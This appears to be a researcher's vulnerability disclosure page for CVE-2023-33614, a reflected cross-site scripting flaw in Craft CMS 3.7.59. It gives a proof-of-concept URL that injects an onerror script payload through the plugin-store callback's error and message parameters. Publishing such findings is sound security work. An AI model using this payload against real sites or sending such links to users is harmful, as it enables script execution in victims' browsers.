[CVE-2023-33614] Reflected - Cross Site Script (XSS)

Exploit Author: Dat Nguyen aka datnlq of VietSunshine Cyber Security Services

Vendor of Product: CraftCMS

Affected Product Code Base: 3.7.59

CVE: CVE-2023-33614

Description: Craft CMS version 3.7.59 is vulnerable of XSS vulnerability, which allows remote unauthenticated attacker to execute javascript code via error and message parameter.

Steps to reproduce:

Send a URL http://localhost/craftcms/web/admin/plugin-store/callback?error=error%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E&message=message%3C/script%3E%3Cimg+src=x+onerror=alert(document.domain)%3E to victim, when user clicked the link, XSS will be executed.

Previous[CVE-2023-30179] Server-Side Template Injection Next[CVE-2023-33616] Server-side request forgery (SSRF)

Last updated 7 months ago